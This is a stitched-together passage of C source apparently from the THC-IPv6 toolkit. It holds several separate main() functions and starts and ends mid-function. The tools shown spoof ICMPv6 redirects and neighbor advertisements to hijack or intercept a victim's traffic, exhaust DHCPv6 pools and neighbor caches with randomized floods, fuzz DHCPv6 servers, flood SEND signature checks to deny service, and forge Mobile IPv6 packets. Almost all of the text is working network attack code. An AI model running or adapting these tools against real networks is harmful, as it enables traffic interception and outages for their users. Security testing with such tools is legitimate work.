return -1;
if (thc_generate_and_send_pkt(interface, fakemac, NULL, pkt, &pkt_len) < 0) {
fprintf(stderr, "Error: Can not send packet, exiting ...\n");
exit(-1);
}
usleep(25000);
ipv6 = (thc_ipv6_hdr *) pkt;
thc_inverse_packet(ipv6->pkt + offset, ipv6->pkt_len - offset);
ipv6->pkt[offset + 7] = (unsigned char) ttl;
thc_redir6(interface, oldrouter6, fakemac, NULL, newrouter6, mac6, ipv6->pkt + 14, ipv6->pkt_len - 14);
printf("Sent ICMPv6 redirect for %s\n", argv[3]);
free(self6);
free(fakemac);
return 0;
}
int main(int argc, char *argv[]) {
char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL, *pkt2 = NULL;
char wdatabuf[1024], wdatabuf2[1024];
unsigned char *mac6 = mac, *src, *dst;
int i, s, len, len2, pkt_len = 0, pkt2_len = 0;
unsigned long long int count = 0;
pcap_t *p = NULL;
int do_all = 1, use_real_mac = 1, use_real_link = 1;
if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);
while ((i = getopt(argc, argv, "dnNr1")) >= 0) {
switch (i) {
case 'N':
use_real_link = 1; // no break
case 'n':
use_real_mac = 1;
break;
case '1':
do_all = 0;
break;
case 'r':
i = 0;
break; // just to ignore -r
default:
fprintf(stderr, "Error: unknown option -%c\n", i);
exit(-1);
}
}
memset(mac, 0, sizeof(mac));
interface = argv[optind];
if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
dns_name = argv[optind + 1];
if (use_real_link)
src = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
else
src = thc_resolve6("fe80::");
if (use_real_mac)
mac6 = thc_get_own_mac(interface);
dst = thc_resolve6("ff02::1:2");
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
// only to prevent our system to send icmp port unreachable messages
if ((s = thc_bind_udp_port(546)) < 0)
fprintf(stderr, "Warning: could not bind to 546/udp\n");
if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) {
fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface);
exit(-1);
}
len = sizeof(solicit);
memcpy(wdatabuf, solicit, len);
len2 = sizeof(inforeq);
memcpy(wdatabuf2, inforeq, len2);
printf("Sending DHCPv6 Solicitate message ...\n");
printf("Sending DHCPv6 Information Request message ...\n");
if (!use_real_link)
memcpy(src + 8, (char *) &count, 8);
// start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
for (i = 0; i < 3; i++) {
wdatabuf[i + 32] = rand() % 256;
wdatabuf[i + 18] = rand() % 256;
mac[i + 2] = rand() % 256;
}
if (!use_real_mac)
memcpy(wdatabuf + 22, mac, 6);
if (!use_real_mac)
memcpy(wdatabuf2 + 18, mac, 6);
memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3);
memcpy(wdatabuf2 + 1, (char *) &count + _TAKE3, 3);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
printf("!");
if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt2_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_udp(pkt2, &pkt2_len, 546, 547, 0, wdatabuf2, len2) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt2, &pkt2_len) < 0)
printf("!");
signal(SIGALRM, clean_exit);
alarm(3);
// i = thc_send_pkt(interface, pkt, &pkt_len);
pkt = thc_destroy_packet(pkt);
while (1) {
usleep(75);
while (thc_pcap_check(p, (char *) check_packets, NULL) > 0);
}
return 0; // never reached
}
int main(int argc, char *argv[]) {
int rawmode = 0, offset = 14;
char string[256] = "ip6";
if (argc < 5 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (strcmp(argv[1], "-r") == 0) {
thc_ipv6_rawmode(1);
rawmode = 1;
argv++;
argc--;
}
if (do_hdr_size)
offset = do_hdr_size;
interface = argv[1];
if ((src6 = thc_resolve6(argv[2])) == NULL) {
if (strcmp(argv[2], "*") != 0) {
fprintf(stderr, "Error: victim-ip is not a valid IPv6 address or '*': %s\n", argv[2]);
exit(-1);
}
}
if ((dest6 = thc_resolve6(argv[3])) == NULL) {
if (strcmp(argv[3], "*") != 0) {
fprintf(stderr, "Error: destination-ip is not a valid IPv6 address or '*': %s\n", argv[3]);
exit(-1);
}
}
if ((oldrouter6 = thc_resolve6(argv[4])) == NULL) {
fprintf(stderr, "Error: old-router is not a valid IPv6 address: %s\n", argv[4]);
exit(-1);
}
if (argc >= 6) {
if ((newrouter6 = thc_resolve6(argv[5])) == NULL) {
fprintf(stderr, "Error: new-router is not a valid IPv6 address: %s\n", argv[5]);
exit(-1);
}
} else
newrouter6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
/* Spoof source mac */
if ((self6 = thc_get_own_ipv6(interface, oldrouter6, PREFER_GLOBAL)) == NULL) {
fprintf(stderr, "Error: could not get own IP address to contact original-router\n");
exit(-1);
}
if ((fakemac = thc_get_mac(interface, self6, oldrouter6)) == NULL) {
fprintf(stderr, "Error: could not resolve mac address for original-router\n");
free(self6);
exit(-1);
}
mac6 = mac;
if (argc >= 7)
sscanf(argv[6], "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4],
(unsigned int *) &mac[5]);
else
mac6 = thc_get_own_mac(interface);
realownmac = thc_get_own_mac(interface);
if (src6 != NULL) {
strcat(string, " and src ");
strcat(string, thc_ipv62notation(src6));
}
if (dest6 != NULL) {
strcat(string, " and dst ");
strcat(string, thc_ipv62notation(dest6));
}
printf("Starting sniffer to get traffic to be redirected (press Control-C to end) ...\n");
return thc_pcap_function(interface, string, (char *) intercept, 1, NULL);
}
int main(int argc, char *argv[]) {
char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL;
// defines mac as 6 pieces and defines pkt as null.
char wdatabuf[1024];
//builds data buffer and sets memory size at 1024mb
unsigned char *mac6 = mac, *src, *dst;
//creates mac6 address usuing
int i, s, len, pkt_len = 0, dlen = 0;
int do_all = 1, use_real_mac = 1, use_real_link = 1;
int state;
if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);
//Parse options
while ((i = getopt(argc, argv, "123456789mn:t:e:T:dFp:fr")) >= 0) {
switch (i) {
case '1':
do_type = DO_SOL;
break;
case '2':
do_type = DO_REQ;
break;
case '3':
do_type = DO_CON;
break;
case '4':
do_type = DO_REN;
break;
case '5':
do_type = DO_REB;
break;
case '6':
do_type = DO_REL;
break;
case '7':
do_type = DO_DEC;
break;
case '8':
do_type = DO_INF;
break;
case 'm':
fuzz_msg_type = 1;
break;
case 'n':
no_send = atoi(optarg);
break;
case 't':
test_start = atoi(optarg);
break;
case 'e':
test_end = atoi(optarg);
break;
case 'T':
test_end = test_start = atoi(optarg);
break;
case 'F':
use_real_link = 0; // no break
case 'f':
use_real_mac = 0;
break;
case 'p':
ping = atoi(optarg);
break;
case 'd':
do_dns = 1;
break;
case 'r':
i = 0;
break; // just to ignore -r
default:
fprintf(stderr, "Error: unknown option -%c\n", i);
exit(-1);
}
}
//Check options
if (no_send < 1) {
fprintf(stderr, "ERROR: -n number must be between one and 2 billion\n");
exit(-1);
}
if (test_end < test_start) {
printf("don't f**k up the command line options!\n");
exit(-1);
}
memset(mac, 0, sizeof(mac));
interface = argv[optind];
dns_name = argv[optind + 1];
if (use_real_link)
src = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
else
src = thc_resolve6("fe80::");
if (use_real_mac) {
mac6 = thc_get_own_mac(interface);
memcpy(mac, mac6, sizeof(mac));
}
dst = thc_resolve6("ff02::1:2");
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
// only to prevent our system to send icmp port unreachable messages
if ((s = thc_bind_udp_port(546)) < 0)
fprintf(stderr, "Warning: could not bind to 546/udp\n");
if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) {
fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface);
exit(-1);
}
//Establish state
if (do_type == DO_SOL || do_type == DO_REB)
state = STATELESS;
else
state = STATEFULL;
// generate full fuzz mask for stateless types and partial for statefull types
strcpy(fuzzbuf, fuzztype_ether);
strcat(fuzzbuf, fuzztype_ip6);
strcat(fuzzbuf, fuzztype_udp);
if (fuzz_msg_type)
strcat(fuzzbuf, fuzztype_dhcp6);
else
strcat(fuzzbuf, fuzztype_dhcp6no);
if (state == STATELESS) {
strcat(fuzzbuf, fuzztype_elapsed_time);
strcat(fuzzbuf, fuzztype_client_identifier);
strcat(fuzzbuf, fuzztype_IA_NA);
if (do_dns)
strcat(fuzzbuf, fuzztype_FQDN);
}
/** Generate packet **/
len = sizeof(solicit);
memcpy(wdatabuf, solicit, len);
//Add dns option
if (do_dns) {
memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1));
memcpy(dns_option_hdr + dns_option_hdr_len, dnsupdate1, sizeof(dnsupdate1));
dlen = len + 8;
len += sizeof(dnsupdate1);
dns_option_hdr_len += sizeof(dnsupdate1);
//Append domain string prefix fuzz mask
if (state == STATELESS) { //<-- Do fuzzbuffer later
for (i = 0; i < 7; ++i) //7 == Length of hard coded domain prefix
strcat(fuzzbuf, "B");
}
if (dns_name != NULL && strlen(dns_name) < 240) {
if (dns_name[0] != '.') {
wdatabuf[len] = '.';
wdatabuf[dlen - 5]++;
wdatabuf[dlen - 3]++;
len++;
}
memcpy(wdatabuf + len, dns_name, strlen(dns_name) + 1);
memcpy(dns_option_hdr + dns_option_hdr_len, dns_name, strlen(dns_name) + 1);
wdatabuf[dlen - 5] += strlen(dns_name) + 1;
wdatabuf[dlen - 3] += strlen(dns_name) + 1;
len += strlen(dns_name) + 1;
dns_option_hdr_len += strlen(dns_name) + 1;
//Append variable length domain string suffix fuzz mask
if (state == STATELESS) {
for (i = 0; i < strlen(dns_name) + 1; ++i)
strcat(fuzzbuf, "B");
}
}
memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2));
memcpy(dns_option_hdr + dns_option_hdr_len, dnsupdate2, sizeof(dnsupdate2));
len += sizeof(dnsupdate2);
dns_option_hdr_len += sizeof(dnsupdate2);
//Append option request (FQDN request) fuzz mask
if (state == STATELESS){
strcat(fuzzbuf, fuzztype_option_request);
}
}
//Set message type
if (state == STATELESS) {
switch (do_type) {
case DO_SOL:
wdatabuf[0] = 0x01;
break;
case DO_REB:
wdatabuf[0] = 0x06;
break;
default:
break;
}
}
//random src mac
if (!use_real_link)
for (i = 0; i < 8; i++)
src[i + 8] = rand() % 256;
// start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
for (i = 0; i < 3; i++) {
wdatabuf[i + 1] = rand() % 256;
wdatabuf[i + 18] = rand() % 256;
wdatabuf[i + 32] = rand() % 256;
if (!use_real_mac) {
mac[i * 2] = rand() % 256;
mac[i * 2 + 1] = rand() % 256;
}
if (do_dns)
wdatabuf[i + dlen] = 'a' + rand() % 26;
}
memcpy(wdatabuf + 22, mac, 6);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0)
return -1;
if (thc_generate_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
return -1;
//Fuzz solicit packet
if (state == STATELESS) {
if (fuzz_loop(pkt, &pkt_len) < 0)
return -1;
}
//Fuzz request, confirm or renew paket
else if (state == STATEFULL) {
//Send a dhcp solicit to discover dhcpv6 servers
if (thc_send_pkt(interface, pkt, &pkt_len) < 0) {
fprintf(stderr, "Error: Failed to send initial solicit packet\n");
return -1;
}
usleep(75); //<-- I don't really know why this is neccessary but it seems to be
//Construct and fuzz packets using server identifier
got_packet = 0;
time_t start_time = time(NULL);
while(time(NULL) - start_time < timeout) {
while (thc_pcap_check(p, (char *) construct_from_adv_and_fuzz, NULL) > 0); //got_packet set in callback function
if (got_packet)
break;
}
if (!got_packet)
fprintf(stderr, "Timeout: Didn't receive solicited advertisement packet within timeout. Is server down?\n");
}
pkt = thc_destroy_packet(pkt);
// printf("fuzzbuf: %s\n", fuzzbuf);
return 0;
}
int main(int argc, char *argv[]) {
char *interface;
int prefer = PREFER_GLOBAL;
unsigned char *srcmac;
unsigned char *dst6, *src6;
unsigned char *ptr;
//char dstmac[6] = "";
unsigned char *dstmac = NULL, *tmpmac, *dstnet;
int pkt_len = 16;
int count = 0;
int i;
int size, numbytes, samenet = 0;
unsigned char *pkt = NULL;
unsigned char buf[] = "NDP Exhaustion";
// hardcoded mac
/*dstmac[0] = 0x00;
dstmac[1] = 0x05;
dstmac[2] = 0x73;
dstmac[3] = 0xa0;
dstmac[4] = 0x00;
dstmac[5] = 0x01; */
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
interface = argv[1];
if ((srcmac = thc_get_own_mac(interface)) == NULL) {
printf("Error: invalid interface defined: %s\n", interface);
exit(-1);
}
dstnet = argv[2]; // hier stehts dstnet drin
if (dstnet == NULL || (ptr = index(dstnet, '/')) == NULL) {
printf("Error: Option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. ff80::01/16\n");
exit(-1);
}
*ptr++ = 0;
size = atoi(ptr); // prefix lenght
// printf("Prefix length is %d\n", size);
if (size != 64)
fprintf(stderr, "Warning: unusual network prefix size defined, be sure what your are doing: %d\n", size);
numbytes = (128 - size) / 8; // number of bytes to create
// printf("Creating %d random adress bytes\n", numbytes);
srand(time(NULL) + getpid()); // initalize random number generator
dst6 = thc_resolve6(dstnet);
// thc_dump_data(dst6, 16, "dst");
if (argc >= 4)
src6 = thc_resolve6(argv[3]);
else
src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
// thc_dump_data(src6, 16, "src");
dstmac = thc_get_mac(interface, src6, dst6);
printf("Starting to randomly ping addresses in network %s/%d on %s:\n", dstnet, size, interface);
while (1) {
++count;
for (i = 0; i < numbytes; i++) {
dst6[16 - numbytes + i] = rand() % 256; // direct destination manipulation
}
if (count == 1) {
tmpmac = thc_get_mac(interface, src6, dst6);
if (tmpmac != NULL && dstmac != NULL && memcmp(dstmac, tmpmac, 6) == 0)
samenet = 1;
} else {
if (samenet == 0) {
free(dstmac);
dstmac = thc_get_mac(interface, src6, dst6);
}
}
// printf("%s\n", ip6adr);
// printf("Sending ICMP ECHO to %s\n", ip6adr);
if ((pkt = thc_create_ipv6(interface, prefer, &pkt_len, src6, dst6, 64, 0, 0, 0, 0)) == NULL)
errx(EXIT_FAILURE, "THC: Could not create IPv6 packet\n");
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, buf, sizeof(buf), 0) == -1)
errx(EXIT_FAILURE, "THC: Could not add ICMP6 packet contents\n");
//thc_add_udp(pkt, &pkt_len, 53, 53, 0, buf, sizeof(buf));
if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
printf("!");
thc_destroy_packet(pkt);
usleep(1);
if (count % 100 == 0)
printf(".");
}
}
int main(int argc, char *argv[]) {
char dummy[24], mac[16] = "", buf2[6], buf3[1398];
unsigned char *ownmac = mac;
int i, j;
if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);
if (debug)
printf("Preparing spoofed packet for speed-up\n");
while ((i = getopt(argc, argv, "FHDRl")) >= 0) {
switch (i) {
case 'F':
do_frag++;
break;
case 'H':
do_hop = 1;
break;
case 'D':
do_dst = 1;
break;
case 'R':
do_reverse = 1;
break;
case 'l':
do_loop = 1;
break;
default:
fprintf(stderr, "Error: invalid option %c\n", i);
exit(-1);
}
}
if (argc - optind < 1)
help(argv[0]);
interface = argv[optind];
if (argc - optind == 2 && argv[optind + 1] != NULL)
sscanf(argv[optind + 1], "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4],
(unsigned int *) &mac[5]);
else
ownmac = thc_get_own_mac(interface);
if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
memset(dummy, 'X', sizeof(dummy));
dummy[16] = 2;
dummy[17] = 1;
memcpy(&dummy[18], ownmac, 6);
memset(buf2, 0, sizeof(buf2));
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
for (i = 0; i <= 0 + do_reverse; i++) {
// printf("i: %d\n", i);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, dummy, dummy, 255, 0, 0, 0, 0)) == NULL)
return -1;
if (do_hop) {
ptype = NXT_HBH;
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, sizeof(buf2)) < 0)
return -1;
}
if (do_frag) {
if (ptype == NXT_ICMP6)
ptype = NXT_FRAG;
for (j = 0; j < do_frag; j++)
if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0)
return -1;
}
if (do_dst) {
if (ptype == NXT_ICMP6)
ptype = NXT_DST;
if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0)
return -1;
}
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, ICMP6_NEIGHBORADV_SOLICIT | ICMP6_NEIGHBORADV_OVERRIDE | ICMP6_NEIGHBORADV_ROUTER, dummy, 24, 0) < 0)
return -1;
if (thc_generate_pkt(interface, ownmac, dummy, pkt, &pkt_len) < 0)
return -1;
ipv6 = (thc_ipv6_hdr *) pkt;
memset(ipv6->pkt + 56 + (do_dst * 1400) + (do_hop + do_frag) * 8, 0, 2); // reset checksum to zero
if (debug) {
thc_dump_data(ipv6->pkt, ipv6->pkt_len, "Prepared spoofing packet");
printf("\n");
}
// printf("i: %d, do_reverse: %d\n", i, do_reverse);
if (i == 0 && do_reverse) {
// printf("ipv62->ipv6 %p\n", ipv6);
ipv62 = ipv6;
ipv62->pkt[0] = 0x33; // multicast mac hack for destination
ipv62->pkt[1] = 0x33; // multicast mac hack for destination
ipv6 = NULL;
pkt2 = pkt;
pkt = NULL;
pkt2_len = pkt_len;
pkt_len = 0;
ipv62->pkt[pkt2_len - 28] = 0xa0; // reset SOL flag, ROUTER+OVERRIDE only
}
}
signal(SIGTERM, kill_children);
signal(SIGSEGV, kill_children);
signal(SIGHUP, kill_children);
signal(SIGINT, kill_children);
memset((char*)pp, 0, sizeof(pp));
printf("Remember to enable routing (ip_forwarding), you will denial service otherwise!\n");
printf(" => echo 1 > /proc/sys/net/ipv6/conf/all/forwarding\n");
printf("Started ICMP6 Neighbor Solitication Interceptor (Press Control-C to end) ...\n");
return thc_pcap_function(interface, "icmp6", (char *) intercept, 1, NULL);
}
/* main function */
int main(int argc, char **argv) {
thc_cga_hdr *cga_opt; /* CGA header */
thc_key_t *key; /* public key */
unsigned char *pkt = NULL; /* generic packet space */
unsigned char *dst6, *cga, *dev; /* IPv6 addrs */
/* various parts of packets, temporaries */
char advdummy[16], soldummy[24], prefix[8], *addr;
/* MAC addresses for testing, attacking */
// unsigned char dsthw[] = "\xff\xff\xff\xff\xff\xff";
// unsigned char tgthw[] = "\x00\x1a\xa0\x41\xf0\x2d"; /*real attack mac */
unsigned char *tgthw;
// unsigned char srchw[] = "\xdd\xde\xad\xbe\xef\xdd";
// unsigned char srchwreal[] = "\x00\x11\x11\x32\xb2\x84";
// unsigned char tag[] = "\xdd\xde\xad\xbe\xef\xdd\xdd\xde\xad\xbe\xef\xdd\xbe\xef\xaa\xaa";
int pkt_len = 0; /* packet length */
int flags = 0; /* ICMPv6 flags */
// thc_ipv6_rawmode(0); /* generate my own MAC addresses */
int debug = 0; /* debug switch */
FILE *fp; /* file pointer for reading from /dev/urandom */
unsigned char test[6]; /* randomized mac storage */
int result = 0, pid, status, i; /* exit codes */
int count = 1000000000;
if (argc != 5) {
printf("original sendpees by willdamn <*****@*****.**>\n");
printf("modified sendpeesMP by Marcin Pohl <*****@*****.**>\nCode based on thc-ipv6\n\n");
printf("Syntax: %s interface key_length prefix victim\n\n", argv[0]);
printf("Send SEND neighbor solicitation messages and make target to verify a lota CGA and RSA signatures\n");
printf("Example: %s eth0 2048 fe80:: fe80::1\n\n", argv[0]);
exit(1);
}
memset(&test, 0, 6); /* set 6 bytes to zero */
fp = fopen("/dev/urandom", "r"); /* set FP to /dev/urandom */
dev = argv[1]; /* read interface from commandline */
if ((addr = thc_resolve6(argv[3])) == NULL) {
fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[3]);
exit(-1);
}
if (thc_get_own_ipv6(dev, NULL, PREFER_LINK) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", dev);
exit(-1);
}
memcpy(prefix, addr, 8); /* first 8 bytes of sockaddr is prefix */
key = thc_generate_key(atoi(argv[2])); /* EXPENSIVE KEYGEN HERE! */
if (key == NULL) {
printf("Couldn't generate key!");
exit(1);
}
/*makes options and the address*/
cga_opt = thc_generate_cga(prefix, key, &cga);
/* cga = thc_resolve6("::"); */
if (cga_opt == NULL) {
printf("Error during CGA generation");
exit(1);
}
/* ICMP6 TARGET, IPDST */
if (argv[4] == NULL)
dst6 = thc_resolve6("ff02::1");
else
dst6 = thc_resolve6(argv[4]);
tgthw = thc_get_mac(dev, cga, dst6);
test[0] = 0; /* set MAC to intel */
test[1] = 170; /* set MAC to intel */
test[2] = 0; /* set MAC to intel */
/* set ICMP OPTION SLLA HERE */
memset(advdummy, 'D', sizeof(advdummy));
memset(soldummy, 'D', sizeof(soldummy));
/* set destination IP here */
memcpy(advdummy, dst6, 16); /*dstIP */
memcpy(soldummy, dst6, 16); /*dstIP */
/* fixed values for NS */
soldummy[16] = 1;
soldummy[17] = 1;
memcpy(&soldummy[18], test, 6); /* SLLA OPTION */
/* ND flags */
flags = ICMP6_NEIGHBORADV_OVERRIDE;
/* the forking starts here */
for (i = 0; i < THREAD_NUM; ++i) {
pid = fork();
if (pid == 0) {
printf("Creating thread %d\n", i);
/*randomize MAC here*/
result = fread((char *) &test[3], 1, 3, fp);
/* create IPv6 portion */
if ((pkt = thc_create_ipv6_extended(dev, PREFER_LINK, &pkt_len, cga, dst6, 0, 0, 0, 0, 0)) == NULL) {
printf("Cannot create IPv6 header\n");
exit(1);
}
/* create ICMPv6 with SeND options */
if (thc_add_send(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0x0, flags, soldummy, 24, cga_opt, key, NULL, 0) < 0) {
printf("Cannot add SEND options\n");
exit(1);
}
free(cga_opt);
if (debug) {
printf("%02x:%02x:%02x:%02x:%02x:%02x\n", test[0], test[1], test[2], test[3], test[4], test[5]);
// printf("%02x:%02x:%02x:%02x:%02x:%02x\n", dsthw[0], dsthw[1], dsthw[2], dsthw[3], dsthw[4], dsthw[5]);
fflush(stdout);
}
/* attach the IPv6+ICMPv6+SeND to an Ethernet frame with random MAC */
if ((result = thc_generate_pkt(dev, test, tgthw, pkt, &pkt_len)) < 0) {
fprintf(stderr, "Couldn't generate IPv6 packet, error num %d !\n", result);
exit(1);
}
printf("Sending %d...", i);
fflush(stdout);
while (count) {
/* send many packets */
thc_send_pkt(dev, pkt, &pkt_len);
--count;
}
exit(1);
}
}
wait(&status);
return 0;
}
int main(int argc, char *argv[]) {
unsigned char *pkt1 = NULL, buf[24], buf2[6], buf3[1500];
unsigned char *unicast6, *src6 = NULL, *dst6 = NULL, srcmac[16] = "", *mac = srcmac;
int pkt1_len = 0, flags, prefer = PREFER_GLOBAL, i, do_hop = 0, do_dst = 0, do_frag = 0, cnt, type = NXT_ICMP6, offset = 14;
char *interface;
int rawmode = 0;
thc_ipv6_hdr *hdr;
if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);
while ((i = getopt(argc, argv, "DFHr")) >= 0) {
switch (i) {
case 'r':
thc_ipv6_rawmode(1);
rawmode = 1;
break;
case 'F':
do_frag++;
break;
case 'H':
do_hop = 1;
break;
case 'D':
do_dst = 1;
break;
default:
fprintf(stderr, "Error: invalid option %c\n", i);
exit(-1);
}
}
if (argc - optind < 2)
help(argv[0]);
if (do_hdr_size)
offset = do_hdr_size;
interface = argv[optind];
if ((unicast6 = thc_resolve6(argv[optind + 1])) == NULL) {
fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[optind + 1]);
exit(-1);
}
if (argc - optind >= 3 && argv[optind + 2] != NULL)
dst6 = thc_resolve6(argv[optind + 2]);
else
dst6 = thc_resolve6("ff02::1");
if (dst6 == NULL) {
fprintf(stderr, "Error: could not resolve destination of solicitate: %s\n", argv[optind + 2]);
exit(-1);
}
if (rawmode == 0) {
if (argc - optind >= 4 && argv[optind + 3] != NULL)
sscanf(argv[optind + 3], "%x:%x:%x:%x:%x:%x", (unsigned int *) &srcmac[0], (unsigned int *) &srcmac[1], (unsigned int *) &srcmac[2], (unsigned int *) &srcmac[3],
(unsigned int *) &srcmac[4], (unsigned int *) &srcmac[5]);
else
mac = thc_get_own_mac(interface);
}
if (argc - optind >= 5 && argv[optind + 4] != NULL)
src6 = thc_resolve6(argv[optind + 4]);
else
src6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
if (mac == NULL || src6 == NULL) {
fprintf(stderr, "Error: invalid interface %s or invalid mac/ip defined\n", interface);
exit(-1);
}
memset(buf, 0, sizeof(buf));
memcpy(buf, unicast6, 16);
buf[16] = 1;
buf[17] = 1;
memcpy(&buf[18], mac, 6);
flags = 0; // ICMP6_NEIGHBORADV_OVERRIDE;
memset(buf2, 0, sizeof(buf2));
memset(buf3, 0, sizeof(buf3));
if ((pkt1 = thc_create_ipv6_extended(interface, prefer, &pkt1_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
return -1;
if (do_hop) {
type = NXT_HBH;
if (thc_add_hdr_hopbyhop(pkt1, &pkt1_len, buf2, sizeof(buf2)) < 0)
return -1;
}
if (do_frag) {
if (type == NXT_ICMP6)
type = NXT_FRAG;
for (i = 0; i <= do_frag; i++)
if (thc_add_hdr_oneshotfragment(pkt1, &pkt1_len, cnt++) < 0)
return -1;
}
if (do_dst) {
if (type == NXT_ICMP6)
type = NXT_DST;
if (thc_add_hdr_dst(pkt1, &pkt1_len, buf3, sizeof(buf3)) < 0)
return -1;
}
if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_NEIGHBORSOL, 0, flags, (unsigned char *) &buf, 24, 0) < 0)
return -1;
if (thc_generate_pkt(interface, mac, NULL, pkt1, &pkt1_len) < 0) {
fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
exit(-1);
}
printf("Starting solicitation of %s (Press Control-C to end)\n", argv[optind + 1]);
while (1) {
if (do_dst) {
hdr = (thc_ipv6_hdr *) pkt1;
thc_send_as_fragment6(interface, src6, dst6, type, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240);
} else {
thc_send_pkt(interface, pkt1, &pkt1_len);
}
sleep(5);
}
return 0;
}
int main(int argc, char *argv[]) {
unsigned char *pkt1 = NULL;
unsigned char *h = NULL, *ha = NULL, *coa = NULL, *mac = NULL;
int pkt1_len = 0, rawmode = 0;
unsigned int id = 2, i;
char *interface;
thc_ipv6_hdr *hdr;
if (argc < 4 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (strcmp(argv[1], "-r") == 0) {
thc_ipv6_rawmode(1);
rawmode = 1;
argv++;
argc--;
}
interface = argv[1];
h = thc_resolve6(argv[2]);
ha = thc_resolve6(argv[3]);
coa = thc_resolve6(argv[4]);
if (rawmode == 0 && (mac = thc_get_mac(interface, coa, ha)) == NULL) {
fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]);
exit(-1);
}
if (thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
for (i = 0; i < 4; i++) {
memset(buf, 0, sizeof(buf));
buf[0] = 1;
buf[1] = 2;
buf[4] = 201;
buf[5] = 16;
memcpy(&buf[6], h, 16);
buf_len = 22;
if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt1_len, coa, ha, 64, 0, 0, 0, 0)) == NULL)
return -1;
hdr = (thc_ipv6_hdr *) pkt1;
hdr->original_src = h;
if (thc_add_hdr_dst(pkt1, &pkt1_len, buf, buf_len) < 0)
return -1;
memset(buf, 0, sizeof(buf));
buf[0] = 59;
buf[1] = 3;
buf[2] = 5;
buf[3] = 0;
